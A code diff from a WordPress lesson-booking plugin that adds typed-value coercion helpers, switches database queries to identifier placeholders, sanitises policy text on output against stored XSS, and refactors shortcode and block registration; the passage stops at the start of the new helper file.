@@ -67,8 +67,8 @@ class StripeGateway {
* Seam around the Stripe PaymentIntents create call so tests can stub the
* network request.
*
* @param array<string, mixed> $params
* @param array<string, mixed> $options
* @param array{amount: int, currency: string, metadata: array<string, string>, description: string} $params
* @param array{idempotency_key?: string} $options
*/
protected function paymentIntentsCreate( array $params, array $options ): PaymentIntent {
return $this->client()->paymentIntents->create( $params, $options );
src/Payment/StudioSettings.php
+15 -13
View File
@@ -4,6 +4,7 @@ declare(strict_types=1);
namespace Unsupervised\Schedular\Payment;
use Unsupervised\Schedular\Auth\RoleManager;
use Unsupervised\Schedular\Val;
class StudioSettings {
@@ -16,11 +17,11 @@ class StudioSettings {
public const OPT_HST_RATE = 'us_hst_rate';
public function publishableKey(): string {
return (string) get_option( self::OPT_PUBLISHABLE, '' );
return Val::string( get_option( self::OPT_PUBLISHABLE, '' ) );
}
public function secretKey(): string {
return (string) get_option( self::OPT_SECRET, '' );
return Val::string( get_option( self::OPT_SECRET, '' ) );
}
/**
@@ -28,7 +29,7 @@ class StudioSettings {
* webhook requests genuinely came from Stripe. Empty until configured.
*/
public function webhookSecret(): string {
return (string) get_option( self::OPT_WEBHOOK_SECRET, '' );
return Val::string( get_option( self::OPT_WEBHOOK_SECRET, '' ) );
}
public function mode(): string {
@@ -36,7 +37,7 @@ class StudioSettings {
}
public function currency(): string {
$currency = (string) get_option( self::OPT_CURRENCY, 'CAD' );
$currency = Val::string( get_option( self::OPT_CURRENCY, 'CAD' ) );
return '' !== $currency ? strtoupper( $currency ) : 'CAD';
}
@@ -46,14 +47,14 @@ class StudioSettings {
* no override).
*/
public function etransferEmail(): string {
return (string) get_option( self::OPT_ETRANSFER_EMAIL, '' );
return Val::string( get_option( self::OPT_ETRANSFER_EMAIL, '' ) );
}
/**
* Default HST/tax rate as a percentage (e.g. 13.0). 0 means no tax.
*/
public function hstRate(): float {
return max( 0.0, (float) get_option( self::OPT_HST_RATE, 0 ) );
return max( 0.0, Val::float( get_option( self::OPT_HST_RATE, 0 ) ) );
}
/**
@@ -92,22 +93,23 @@ class StudioSettings {
private function save(): void {
// Nonce is verified by the caller (renderPage) before this method runs.
// phpcs:disable WordPress.Security.NonceVerification.Missing
$mode = sanitize_key( wp_unslash( $_POST['mode'] ?? 'test' ) );
update_option( self::OPT_PUBLISHABLE, sanitize_text_field( wp_unslash( $_POST['publishable_key'] ?? '' ) ) );
$mode = sanitize_key( Val::string( wp_unslash( $_POST['mode'] ?? 'test' ) ) );
update_option( self::OPT_PUBLISHABLE, sanitize_text_field( Val::string( wp_unslash( $_POST['publishable_key'] ?? '' ) ) ) );
// Secret fields are write-only: a blank submission keeps the stored secret,
// so an admin saving other settings never wipes the keys.
$secretKey = sanitize_text_field( wp_unslash( $_POST['secret_key'] ?? '' ) );
$secretKey = sanitize_text_field( Val::string( wp_unslash( $_POST['secret_key'] ?? '' ) ) );
if ( '' !== $secretKey ) {
update_option( self::OPT_SECRET, $secretKey );
}
$webhookSecret = sanitize_text_field( wp_unslash( $_POST['webhook_secret'] ?? '' ) );
$webhookSecret = sanitize_text_field( Val::string( wp_unslash( $_POST['webhook_secret'] ?? '' ) ) );
if ( '' !== $webhookSecret ) {
update_option( self::OPT_WEBHOOK_SECRET, $webhookSecret );
}
update_option( self::OPT_MODE, 'live' === $mode ? 'live' : 'test' );
update_option( self::OPT_CURRENCY, strtoupper( sanitize_text_field( wp_unslash( $_POST['currency'] ?? 'CAD' ) ) ) );
update_option( self::OPT_ETRANSFER_EMAIL, sanitize_email( wp_unslash( $_POST['etransfer_email'] ?? '' ) ) );
$hstRate = isset( $_POST['hst_rate'] ) ? (float) $_POST['hst_rate'] : 0.0;
update_option( self::OPT_CURRENCY, strtoupper( sanitize_text_field( Val::string( wp_unslash( $_POST['currency'] ?? 'CAD' ) ) ) ) );
update_option( self::OPT_ETRANSFER_EMAIL, sanitize_email( Val::string( wp_unslash( $_POST['etransfer_email'] ?? '' ) ) ) );
// phpcs:ignore WordPress.Security.ValidatedSanitizedInput.MissingUnslash, WordPress.Security.ValidatedSanitizedInput.InputNotSanitized -- Val::float() coerces to float; slashes cannot survive numeric coercion.
$hstRate = isset( $_POST['hst_rate'] ) ? Val::float( $_POST['hst_rate'] ) : 0.0;
update_option( self::OPT_HST_RATE, max( 0.0, $hstRate ) );
// phpcs:enable WordPress.Security.NonceVerification.Missing
}
src/Plugin.php
+16 -1
View File
@@ -4,10 +4,14 @@ declare(strict_types=1);
namespace Unsupervised\Schedular;
use Unsupervised\Schedular\Auth\InviteRepository;
use Unsupervised\Schedular\Auth\LoginPage;
use Unsupervised\Schedular\Auth\RegistrationPage;
use Unsupervised\Schedular\Auth\RoleManager;
use Unsupervised\Schedular\Booking\BookingPage;
use Unsupervised\Schedular\Availability\AvailabilityRepository;
use Unsupervised\Schedular\Booking\BookingRepository;
use Unsupervised\Schedular\GroupClass\EnrollmentRepository;
use Unsupervised\Schedular\GroupClass\GroupClassPage;
use Unsupervised\Schedular\Offering\OfferingRepository;
use Unsupervised\Schedular\Payment\BillingMethodResolver;
use Unsupervised\Schedular\Payment\PaymentRepository;
@@ -29,6 +33,9 @@ class Plugin {
load_plugin_textdomain( 'unsupervised-schedular', false, dirname( plugin_basename( USC_PLUGIN_FILE ) ) . '/languages' );
global $wpdb;
if ( ! $wpdb instanceof \wpdb ) {
return;
}
$availability = new AvailabilityRepository( $wpdb );
$bookings = new BookingRepository( $wpdb );
$offerings = new OfferingRepository( $wpdb );
@@ -48,9 +55,17 @@ class Plugin {
$stripe = new StripeGateway( $settings );
$paymentService = new PaymentService( $paymentRepo, $resolver, new ReceiptMailer(), $bookings, $enrollments, $settings, $stripe );
// The shortcode and block wrappers share the same page objects so
// front-end output is identical whichever way a page embeds them.
$bookingPage = new BookingPage();
$loginPage = new LoginPage();
$registrationPage = new RegistrationPage( $invites, $policies, $policyVersions, $acceptances );
$groupClassPage = new GroupClassPage();
( new RoleManager() )->register();
( new AdminMenu( $availability, $bookings, $offerings, $questions, $policies, $policyVersions, $policyService, $invites, $enrollments, $settings, $paymentRepo, $paymentService, $resolver ) )->register();
( new RestRegistrar( $availability, $bookings, $offerings, $questions, $policies, $policyVersions, $policyService, $registrationGate, $enrollments, $paymentService ) )->register();
( new ShortcodeRegistrar( $invites, $policies, $policyVersions, $acceptances ) )->register();
( new ShortcodeRegistrar( $bookingPage, $loginPage, $registrationPage, $groupClassPage ) )->register();
( new BlockRegistrar( $bookingPage, $loginPage, $registrationPage, $groupClassPage ) )->register();
}
}
src/Policy/AcceptanceRepository.php
+2 -1
View File
@@ -46,7 +46,8 @@ class AcceptanceRepository {
public function findByRegistration( string $registrationType, int $registrationId ): array {
$rows = $this->db->get_results(
$this->db->prepare(
"SELECT * FROM {$this->table} WHERE registration_type = %s AND registration_id = %d ORDER BY id ASC",
'SELECT * FROM %i WHERE registration_type = %s AND registration_id = %d ORDER BY id ASC',
$this->table,
$registrationType,
$registrationId
)
src/Policy/Policy.php
+8 -6
View File
@@ -3,6 +3,8 @@ declare(strict_types=1);
namespace Unsupervised\Schedular\Policy;
use Unsupervised\Schedular\Val;
class Policy {
public const SCOPE_SIGNUP = 'signup';
@@ -24,13 +26,13 @@ class Policy {
public readonly ?int $id = null,
) {}
public static function fromRow( object $row ): self {
public static function fromRow( \stdClass $row ): self {
return new self(
title: $row->title,
slug: $row->slug,
currentVersionId: null !== $row->current_version_id ? (int) $row->current_version_id : null,
acceptanceScope: $row->acceptance_scope,
id: (int) $row->id,
title: Val::string( $row->title ),
slug: Val::string( $row->slug ),
currentVersionId: Val::intOrNull( $row->current_version_id ),
acceptanceScope: Val::string( $row->acceptance_scope ),
id: Val::int( $row->id ),
);
}
src/Policy/PolicyAcceptance.php
+10 -8
View File
@@ -3,6 +3,8 @@ declare(strict_types=1);
namespace Unsupervised\Schedular\Policy;
use Unsupervised\Schedular\Val;
class PolicyAcceptance {
public const REG_ACCOUNT = 'account';
@@ -27,15 +29,15 @@ class PolicyAcceptance {
public readonly ?int $id = null,
) {}
public static function fromRow( object $row ): self {
public static function fromRow( \stdClass $row ): self {
return new self(
policyVersionId: (int) $row->policy_version_id,
studentId: (int) $row->student_id,
registrationType: $row->registration_type,
registrationId: (int) $row->registration_id,
ipAddress: $row->ip_address,
acceptedAt: $row->accepted_at,
id: (int) $row->id,
policyVersionId: Val::int( $row->policy_version_id ),
studentId: Val::int( $row->student_id ),
registrationType: Val::string( $row->registration_type ),
registrationId: Val::int( $row->registration_id ),
ipAddress: Val::stringOrNull( $row->ip_address ),
acceptedAt: Val::stringOrNull( $row->accepted_at ),
id: Val::int( $row->id ),
);
}
src/Policy/PolicyController.php
+9 -8
View File
@@ -4,6 +4,7 @@ declare(strict_types=1);
namespace Unsupervised\Schedular\Policy;
use Unsupervised\Schedular\Auth\RoleManager;
use Unsupervised\Schedular\Val;
class PolicyController {
@@ -23,7 +24,7 @@ class PolicyController {
}
// phpcs:ignore WordPress.Security.NonceVerification.Recommended -- read-only policy selector.
$policyId = absint( $_GET['policy_id'] ?? 0 );
$policyId = absint( Val::int( $_GET['policy_id'] ?? 0 ) );
$policyList = $this->policies->findAll();
$selectedPolicy = $policyId > 0 ? $this->policies->findById( $policyId ) : null;
$policyVersions = null !== $selectedPolicy ? $this->versions->findByPolicy( (int) $selectedPolicy->id ) : null;
@@ -34,13 +35,13 @@ class PolicyController {
private function handleFormAction(): void {
// Nonce is verified by the caller (renderPage) before this method runs.
// phpcs:disable WordPress.Security.NonceVerification.Missing
$action = sanitize_key( wp_unslash( $_POST['usc_action'] ?? '' ) );
$action = sanitize_key( Val::string( wp_unslash( $_POST['usc_action'] ?? '' ) ) );
if ( 'create_policy' === $action ) {
$title = sanitize_text_field( wp_unslash( $_POST['title'] ?? '' ) );
$slugRaw = sanitize_text_field( wp_unslash( $_POST['slug'] ?? '' ) );
$title = sanitize_text_field( Val::string( wp_unslash( $_POST['title'] ?? '' ) ) );
$slugRaw = sanitize_text_field( Val::string( wp_unslash( $_POST['slug'] ?? '' ) ) );
$slug = sanitize_title( '' !== $slugRaw ? $slugRaw : $title );
$scope = sanitize_key( wp_unslash( $_POST['acceptance_scope'] ?? Policy::SCOPE_BOOKING ) );
$scope = sanitize_key( Val::string( wp_unslash( $_POST['acceptance_scope'] ?? Policy::SCOPE_BOOKING ) ) );
if ( ! in_array( $scope, Policy::VALID_SCOPES, true ) ) {
$scope = Policy::SCOPE_BOOKING;
@@ -53,18 +54,18 @@ class PolicyController {
return;
}
$policyId = absint( $_POST['policy_id'] ?? 0 );
$policyId = absint( Val::int( $_POST['policy_id'] ?? 0 ) );
if ( $policyId <= 0 || null === $this->policies->findById( $policyId ) ) {
return;
}
if ( 'add_version' === $action ) {
$body = wp_kses_post( wp_unslash( $_POST['body'] ?? '' ) );
$body = wp_kses_post( Val::string( wp_unslash( $_POST['body'] ?? '' ) ) );
$this->service->addDraftVersion( $policyId, $body );
}
if ( 'publish_version' === $action ) {
$versionId = absint( $_POST['version_id'] ?? 0 );
$versionId = absint( Val::int( $_POST['version_id'] ?? 0 ) );
if ( $versionId > 0 ) {
$this->service->publishVersion( $policyId, $versionId );
}
src/Policy/PolicyEndpoint.php
+20 -11
View File
@@ -4,6 +4,7 @@ declare(strict_types=1);
namespace Unsupervised\Schedular\Policy;
use Unsupervised\Schedular\Auth\RoleManager;
use Unsupervised\Schedular\Val;
class PolicyEndpoint {
@@ -13,6 +14,11 @@ class PolicyEndpoint {
private PolicyService $service,
) {}
/**
* Registers this endpoint's REST routes.
*
* @param non-falsy-string $route_namespace REST namespace the routes are registered under (e.g. `us-scheduler/v1`).
*/
public function registerRoutes( string $route_namespace ): void {
register_rest_route(
$route_namespace,
@@ -74,7 +80,7 @@ class PolicyEndpoint {
* `both`-scoped policies).
*/
public function index( \WP_REST_Request $request ): \WP_REST_Response {
$scope = (string) $request->get_param( 'scope' );
$scope = Val::string( $request->get_param( 'scope' ) );
$policies = in_array( $scope, [ Policy::SCOPE_SIGNUP, Policy::SCOPE_BOOKING ], true )
? $this->policies->findForScope( $scope )
: $this->policies->findAll();
@@ -97,7 +103,10 @@ class PolicyEndpoint {
'slug' => $policy->slug,
'policy_version_id' => $version->id,
'version_number' => $version->versionNumber,
'body' => $version->body,
// Bodies are kses'd on every write path, but the booking JS renders
// this HTML raw — sanitise at output too so a missed write path can
// never become stored XSS.
'body' => wp_kses_post( (string) $version->body ),
];
}
@@ -105,12 +114,12 @@ class PolicyEndpoint {
}
public function create( \WP_REST_Request $request ): \WP_REST_Response|\WP_Error {
$title = sanitize_text_field( (string) $request->get_param( 'title' ) );
$title = sanitize_text_field( Val::string( $request->get_param( 'title' ) ) );
if ( '' === $title ) {
return $this->invalid( __( 'A policy title is required.', 'unsupervised-schedular' ) );
}
$slugParam = sanitize_text_field( (string) $request->get_param( 'slug' ) );
$slugParam = sanitize_text_field( Val::string( $request->get_param( 'slug' ) ) );
$slug = sanitize_title( '' !== $slugParam ? $slugParam : $title );
if ( '' === $slug ) {
return $this->invalid( __( 'A valid policy slug is required.', 'unsupervised-schedular' ) );
@@ -120,7 +129,7 @@ class PolicyEndpoint {
return new \WP_Error( 'duplicate_slug', __( 'A policy with that slug already exists.', 'unsupervised-schedular' ), [ 'status' => 409 ] );
}
$scope = (string) ( $request->get_param( 'acceptance_scope' ) ?? Policy::SCOPE_BOOKING );
$scope = Val::string( $request->get_param( 'acceptance_scope' ) ?? Policy::SCOPE_BOOKING );
if ( ! in_array( $scope, Policy::VALID_SCOPES, true ) ) {
return $this->invalid( __( 'Invalid acceptance scope.', 'unsupervised-schedular' ) );
}
@@ -131,12 +140,12 @@ class PolicyEndpoint {
}
public function addVersion( \WP_REST_Request $request ): \WP_REST_Response|\WP_Error {
$policy = $this->policies->findById( absint( $request->get_param( 'id' ) ) );
$policy = $this->policies->findById( absint( Val::int( $request->get_param( 'id' ) ) ) );
if ( null === $policy ) {
return $this->notFound();
}
$body = wp_kses_post( (string) $request->get_param( 'body' ) );
$body = wp_kses_post( Val::string( $request->get_param( 'body' ) ) );
$id = $this->service->addDraftVersion( (int) $policy->id, $body );
return new \WP_REST_Response( [ 'id' => $id ], 201 );
@@ -152,7 +161,7 @@ class PolicyEndpoint {
return $this->invalid( __( 'Only draft versions can be edited.', 'unsupervised-schedular' ) );
}
$body = wp_kses_post( (string) $request->get_param( 'body' ) );
$body = wp_kses_post( Val::string( $request->get_param( 'body' ) ) );
$this->versions->updateBody( (int) $version->id, $body );
return new \WP_REST_Response(
@@ -170,7 +179,7 @@ class PolicyEndpoint {
return $version;
}
$this->service->publishVersion( (int) $request->get_param( 'id' ), (int) $version->id );
$this->service->publishVersion( Val::int( $request->get_param( 'id' ) ), (int) $version->id );
return new \WP_REST_Response(
[
@@ -199,8 +208,8 @@ class PolicyEndpoint {
* Load the version named in the route and confirm it belongs to the policy.
*/
private function loadVersionForPolicy( \WP_REST_Request $request ): PolicyVersion|\WP_Error {
$policyId = absint( $request->get_param( 'id' ) );
$version = $this->versions->findById( absint( $request->get_param( 'vid' ) ) );
$policyId = absint( Val::int( $request->get_param( 'id' ) ) );
$version = $this->versions->findById( absint( Val::int( $request->get_param( 'vid' ) ) ) );
if ( null === $version || $version->policyId !== $policyId ) {
return $this->notFound();
src/Policy/PolicyRepository.php
+4 -3
View File
@@ -36,7 +36,8 @@ class PolicyRepository {
public function findForScope( string $scope ): array {
$rows = $this->db->get_results(
$this->db->prepare(
"SELECT * FROM {$this->table} WHERE acceptance_scope = %s OR acceptance_scope = %s ORDER BY title ASC",
'SELECT * FROM %i WHERE acceptance_scope = %s OR acceptance_scope = %s ORDER BY title ASC',
$this->table,
$scope,
Policy::SCOPE_BOTH
)
@@ -68,7 +69,7 @@ class PolicyRepository {
public function findById( int $id ): ?Policy {
$row = $this->db->get_row(
$this->db->prepare( "SELECT * FROM {$this->table} WHERE id = %d", $id )
$this->db->prepare( 'SELECT * FROM %i WHERE id = %d', $this->table, $id )
);
return $row ? Policy::fromRow( $row ) : null;
@@ -76,7 +77,7 @@ class PolicyRepository {
public function findBySlug( string $slug ): ?Policy {
$row = $this->db->get_row(
$this->db->prepare( "SELECT * FROM {$this->table} WHERE slug = %s", $slug )
$this->db->prepare( 'SELECT * FROM %i WHERE slug = %s', $this->table, $slug )
);
return $row ? Policy::fromRow( $row ) : null;
src/Policy/PolicyVersion.php
+9 -7
View File
@@ -3,6 +3,8 @@ declare(strict_types=1);
namespace Unsupervised\Schedular\Policy;
use Unsupervised\Schedular\Val;
class PolicyVersion {
public const STATUS_DRAFT = 'draft';
@@ -25,14 +27,14 @@ class PolicyVersion {
public readonly ?int $id = null,
) {}
public static function fromRow( object $row ): self {
public static function fromRow( \stdClass $row ): self {
return new self(
policyId: (int) $row->policy_id,
versionNumber: (int) $row->version_number,
body: $row->body,
status: $row->status,
publishedAt: $row->published_at,
id: (int) $row->id,
policyId: Val::int( $row->policy_id ),
versionNumber: Val::int( $row->version_number ),
body: Val::stringOrNull( $row->body ),
status: Val::string( $row->status ),
publishedAt: Val::stringOrNull( $row->published_at ),
id: Val::int( $row->id ),
);
}
src/Policy/PolicyVersionRepository.php
+4 -3
View File
@@ -59,7 +59,8 @@ class PolicyVersionRepository {
public function findByPolicy( int $policyId ): array {
$rows = $this->db->get_results(
$this->db->prepare(
"SELECT * FROM {$this->table} WHERE policy_id = %d ORDER BY version_number DESC",
'SELECT * FROM %i WHERE policy_id = %d ORDER BY version_number DESC',
$this->table,
$policyId
)
);
@@ -69,7 +70,7 @@ class PolicyVersionRepository {
public function findById( int $id ): ?PolicyVersion {
$row = $this->db->get_row(
$this->db->prepare( "SELECT * FROM {$this->table} WHERE id = %d", $id )
$this->db->prepare( 'SELECT * FROM %i WHERE id = %d', $this->table, $id )
);
return $row ? PolicyVersion::fromRow( $row ) : null;
@@ -80,7 +81,7 @@ class PolicyVersionRepository {
*/
public function maxVersionNumber( int $policyId ): int {
$max = $this->db->get_var(
$this->db->prepare( "SELECT MAX(version_number) FROM {$this->table} WHERE policy_id = %d", $policyId )
$this->db->prepare( 'SELECT MAX(version_number) FROM %i WHERE policy_id = %d', $this->table, $policyId )
);
return null === $max ? 0 : (int) $max;
src/Registration/Answer.php
+9 -7
View File
@@ -3,6 +3,8 @@ declare(strict_types=1);
namespace Unsupervised\Schedular\Registration;
use Unsupervised\Schedular\Val;
class Answer {
public const REG_LESSON = 'lesson';
@@ -24,14 +26,14 @@ class Answer {
public readonly ?int $id = null,
) {}
public static function fromRow( object $row ): self {
public static function fromRow( \stdClass $row ): self {
return new self(
questionId: (int) $row->question_id,
registrationType: $row->registration_type,
registrationId: (int) $row->registration_id,
studentId: (int) $row->student_id,
answerValue: $row->answer_value,
id: (int) $row->id,
questionId: Val::int( $row->question_id ),
registrationType: Val::string( $row->registration_type ),
registrationId: Val::int( $row->registration_id ),
studentId: Val::int( $row->student_id ),
answerValue: Val::stringOrNull( $row->answer_value ),
id: Val::int( $row->id ),
);
}
src/Registration/AnswerRepository.php
+2 -1
View File
@@ -46,7 +46,8 @@ class AnswerRepository {
public function findByRegistration( string $registrationType, int $registrationId ): array {
$rows = $this->db->get_results(
$this->db->prepare(
"SELECT * FROM {$this->table} WHERE registration_type = %s AND registration_id = %d ORDER BY id ASC",
'SELECT * FROM %i WHERE registration_type = %s AND registration_id = %d ORDER BY id ASC',
$this->table,
$registrationType,
$registrationId
)
src/Registration/Question.php
+14 -10
View File
@@ -3,6 +3,8 @@ declare(strict_types=1);
namespace Unsupervised\Schedular\Registration;
use Unsupervised\Schedular\Val;
class Question {
public const FIELD_TEXT = 'text';
@@ -38,22 +40,24 @@ class Question {
public readonly ?int $id = null,
) {}
public static function fromRow( object $row ): self {
public static function fromRow( \stdClass $row ): self {
$options = null;
if ( null !== $row->options && '' !== $row->options ) {
$decoded = json_decode( (string) $row->options, true );
$options = is_array( $decoded ) ? array_values( array_map( 'strval', $decoded ) ) : null;
$decoded = json_decode( Val::string( $row->options ), true );
$options = is_array( $decoded )
? array_values( array_map( static fn( mixed $v ): string => Val::string( $v ), $decoded ) )
: null;
}
return new self(
offeringId: (int) $row->offering_id,
label: $row->label,
fieldType: $row->field_type,
offeringId: Val::int( $row->offering_id ),
label: Val::string( $row->label ),
fieldType: Val::string( $row->field_type ),
options: $options,
isRequired: (bool) $row->is_required,
sortOrder: (int) $row->sort_order,
isActive: (bool) $row->is_active,
id: (int) $row->id,
isRequired: Val::bool( $row->is_required ),
sortOrder: Val::int( $row->sort_order ),
isActive: Val::bool( $row->is_active ),
id: Val::int( $row->id ),
);
}
src/Registration/QuestionController.php
+8 -7
View File
@@ -6,6 +6,7 @@ namespace Unsupervised\Schedular\Registration;
use Unsupervised\Schedular\Auth\RoleManager;
use Unsupervised\Schedular\Offering\Offering;
use Unsupervised\Schedular\Offering\OfferingRepository;
use Unsupervised\Schedular\Val;
class QuestionController {
@@ -23,7 +24,7 @@ class QuestionController {
$manageAll = current_user_can( RoleManager::CAP_MANAGE_INSTRUCTORS );
// phpcs:ignore WordPress.Security.NonceVerification.Recommended -- read-only offering selector.
$offeringId = absint( $_GET['offering_id'] ?? 0 );
$offeringId = absint( Val::int( $_GET['offering_id'] ?? 0 ) );
$offeringList = $manageAll ? $this->offerings->findAll() : $this->offerings->findAll( $userId );
$selectedOffering = $offeringId > 0 ? $this->offerings->findById( $offeringId ) : null;
@@ -46,14 +47,14 @@ class QuestionController {
private function handleFormAction( Offering $offering ): void {
// Nonce is verified by the caller (renderPage) before this method runs.
// phpcs:disable WordPress.Security.NonceVerification.Missing
$action = sanitize_key( wp_unslash( $_POST['usc_action'] ?? '' ) );
$action = sanitize_key( Val::string( wp_unslash( $_POST['usc_action'] ?? '' ) ) );
if ( 'add' === $action ) {
$this->addQuestion( (int) $offering->id );
}
if ( 'delete' === $action ) {
$questionId = absint( $_POST['question_id'] ?? 0 );
$questionId = absint( Val::int( $_POST['question_id'] ?? 0 ) );
if ( $questionId > 0 ) {
$question = $this->questions->findById( $questionId );
if ( $question && $question->offeringId === (int) $offering->id ) {
@@ -66,8 +67,8 @@ class QuestionController {
private function addQuestion( int $offeringId ): void {
// phpcs:disable WordPress.Security.NonceVerification.Missing
$label = sanitize_text_field( wp_unslash( $_POST['label'] ?? '' ) );
$fieldType = sanitize_key( wp_unslash( $_POST['field_type'] ?? Question::FIELD_TEXT ) );
$label = sanitize_text_field( Val::string( wp_unslash( $_POST['label'] ?? '' ) ) );
$fieldType = sanitize_key( Val::string( wp_unslash( $_POST['field_type'] ?? Question::FIELD_TEXT ) ) );
if ( '' === $label || ! in_array( $fieldType, Question::VALID_FIELD_TYPES, true ) ) {
return;
@@ -78,9 +79,9 @@ class QuestionController {
offeringId: $offeringId,
label: $label,
fieldType: $fieldType,
options: $this->parseOptions( sanitize_textarea_field( wp_unslash( $_POST['options'] ?? '' ) ) ),
options: $this->parseOptions( sanitize_textarea_field( Val::string( wp_unslash( $_POST['options'] ?? '' ) ) ) ),
isRequired: isset( $_POST['is_required'] ),
sortOrder: absint( $_POST['sort_order'] ?? 0 ),
sortOrder: absint( Val::int( $_POST['sort_order'] ?? 0 ) ),
)
);
// phpcs:enable WordPress.Security.NonceVerification.Missing
src/Registration/QuestionEndpoint.php
+17 -11
View File
@@ -5,6 +5,7 @@ namespace Unsupervised\Schedular\Registration;
use Unsupervised\Schedular\Auth\RoleManager;
use Unsupervised\Schedular\Offering\OfferingRepository;
use Unsupervised\Schedular\Val;
class QuestionEndpoint {
@@ -13,6 +14,11 @@ class QuestionEndpoint {
private OfferingRepository $offerings,
) {}
/**
* Registers this endpoint's REST routes.
*
* @param non-falsy-string $route_namespace REST namespace the routes are registered under (e.g. `us-scheduler/v1`).
*/
public function registerRoutes( string $route_namespace ): void {
register_rest_route(
$route_namespace,
@@ -57,24 +63,24 @@ class QuestionEndpoint {
}
public function index( \WP_REST_Request $request ): \WP_REST_Response {
$questions = $this->questions->findByOffering( absint( $request->get_param( 'id' ) ), activeOnly: true );
$questions = $this->questions->findByOffering( absint( Val::int( $request->get_param( 'id' ) ) ), activeOnly: true );
return new \WP_REST_Response( array_map( fn( Question $q ) => $q->toArray(), $questions ), 200 );
}
public function create( \WP_REST_Request $request ): \WP_REST_Response|\WP_Error {
$offeringId = absint( $request->get_param( 'offering_id' ) );
$offeringId = absint( Val::int( $request->get_param( 'offering_id' ) ) );
$ownerCheck = $this->requireOfferingOwner( $offeringId );
if ( $ownerCheck instanceof \WP_Error ) {
return $ownerCheck;
}
$label = sanitize_text_field( (string) $request->get_param( 'label' ) );
$label = sanitize_text_field( Val::string( $request->get_param( 'label' ) ) );
if ( '' === $label ) {
return $this->invalid( __( 'A question label is required.', 'unsupervised-schedular' ) );
}
$fieldType = (string) ( $request->get_param( 'field_type' ) ?? Question::FIELD_TEXT );
$fieldType = Val::string( $request->get_param( 'field_type' ) ?? Question::FIELD_TEXT );
if ( ! in_array( $fieldType, Question::VALID_FIELD_TYPES, true ) ) {
return $this->invalid( __( 'Invalid field type.', 'unsupervised-schedular' ) );
}
@@ -85,7 +91,7 @@ class QuestionEndpoint {
fieldType: $fieldType,
options: $this->sanitizeOptions( $request->get_param( 'options' ) ),
isRequired: (bool) $request->get_param( 'is_required' ),
sortOrder: (int) $request->get_param( 'sort_order' ),
sortOrder: Val::int( $request->get_param( 'sort_order' ) ),
isActive: null === $request->get_param( 'is_active' ) ? true : (bool) $request->get_param( 'is_active' ),
);
@@ -95,7 +101,7 @@ class QuestionEndpoint {
}
public function update( \WP_REST_Request $request ): \WP_REST_Response|\WP_Error {
$id = absint( $request->get_param( 'id' ) );
$id = absint( Val::int( $request->get_param( 'id' ) ) );
$existing = $this->questions->findById( $id );
if ( null === $existing ) {
@@ -107,18 +113,18 @@ class QuestionEndpoint {
return $ownerCheck;
}
$fieldType = $request->has_param( 'field_type' ) ? (string) $request->get_param( 'field_type' ) : $existing->fieldType;
$fieldType = $request->has_param( 'field_type' ) ? Val::string( $request->get_param( 'field_type' ) ) : $existing->fieldType;
if ( ! in_array( $fieldType, Question::VALID_FIELD_TYPES, true ) ) {
return $this->invalid( __( 'Invalid field type.', 'unsupervised-schedular' ) );
}
$question = new Question(
offeringId: $existing->offeringId,
label: $request->has_param( 'label' ) ? sanitize_text_field( (string) $request->get_param( 'label' ) ) : $existing->label,
label: $request->has_param( 'label' ) ? sanitize_text_field( Val::string( $request->get_param( 'label' ) ) ) : $existing->label,
fieldType: $fieldType,
options: $request->has_param( 'options' ) ? $this->sanitizeOptions( $request->get_param( 'options' ) ) : $existing->options,
isRequired: $request->has_param( 'is_required' ) ? (bool) $request->get_param( 'is_required' ) : $existing->isRequired,
sortOrder: $request->has_param( 'sort_order' ) ? (int) $request->get_param( 'sort_order' ) : $existing->sortOrder,
sortOrder: $request->has_param( 'sort_order' ) ? Val::int( $request->get_param( 'sort_order' ) ) : $existing->sortOrder,
isActive: $request->has_param( 'is_active' ) ? (bool) $request->get_param( 'is_active' ) : $existing->isActive,
id: $id,
);
@@ -129,7 +135,7 @@ class QuestionEndpoint {
}
public function delete( \WP_REST_Request $request ): \WP_REST_Response|\WP_Error {
$id = absint( $request->get_param( 'id' ) );
$id = absint( Val::int( $request->get_param( 'id' ) ) );
$existing = $this->questions->findById( $id );
if ( null === $existing ) {
@@ -192,7 +198,7 @@ class QuestionEndpoint {
$options = array_values(
array_filter(
array_map(
static fn( $option ): string => sanitize_text_field( (string) $option ),
static fn( mixed $option ): string => sanitize_text_field( Val::string( $option ) ),
$value
)
)
src/Registration/QuestionRepository.php
+3 -3
View File
@@ -54,8 +54,8 @@ class QuestionRepository {
* @return list<Question>
*/
public function findByOffering( int $offeringId, bool $activeOnly = false ): array {
$sql = "SELECT * FROM {$this->table} WHERE offering_id = %d";
$params = [ $offeringId ];
$sql = 'SELECT * FROM %i WHERE offering_id = %d';
$params = [ $this->table, $offeringId ];
if ( $activeOnly ) {
$sql .= ' AND is_active = %d';
@@ -71,7 +71,7 @@ class QuestionRepository {
public function findById( int $id ): ?Question {
$row = $this->db->get_row(
$this->db->prepare( "SELECT * FROM {$this->table} WHERE id = %d", $id )
$this->db->prepare( 'SELECT * FROM %i WHERE id = %d', $this->table, $id )
);
return $row ? Question::fromRow( $row ) : null;
src/ShortcodeRegistrar.php
+5 -19
View File
@@ -3,34 +3,20 @@ declare(strict_types=1);
namespace Unsupervised\Schedular;
use Unsupervised\Schedular\Auth\InviteRepository;
use Unsupervised\Schedular\Auth\LoginPage;
use Unsupervised\Schedular\Auth\RegistrationPage;
use Unsupervised\Schedular\Booking\BookingPage;
use Unsupervised\Schedular\GroupClass\GroupClassPage;
use Unsupervised\Schedular\Payment\StudioSettings;
use Unsupervised\Schedular\Policy\AcceptanceRepository;
use Unsupervised\Schedular\Policy\PolicyRepository;
use Unsupervised\Schedular\Policy\PolicyVersionRepository;
class ShortcodeRegistrar {
private BookingPage $bookingPage;
private LoginPage $loginPage;
private RegistrationPage $registrationPage;
private GroupClassPage $groupClassPage;
public function __construct(
InviteRepository $invites,
PolicyRepository $policies,
PolicyVersionRepository $policyVersions,
AcceptanceRepository $acceptances,
) {
$this->bookingPage = new BookingPage();
$this->loginPage = new LoginPage();
$this->registrationPage = new RegistrationPage( $invites, $policies, $policyVersions, $acceptances );
$this->groupClassPage = new GroupClassPage();
}
private BookingPage $bookingPage,
private LoginPage $loginPage,
private RegistrationPage $registrationPage,
private GroupClassPage $groupClassPage,
) {}
public function register(): void {
add_shortcode( 'us_booking', [ $this->bookingPage, 'render' ] );
src/Val.php
+60
View File
@@ -0,0 +1,60 @@
<?php
declare(strict_types=1);
namespace Unsupervised\Schedular;
/**
* Runtime coercion helpers for values crossing untyped WordPress boundaries
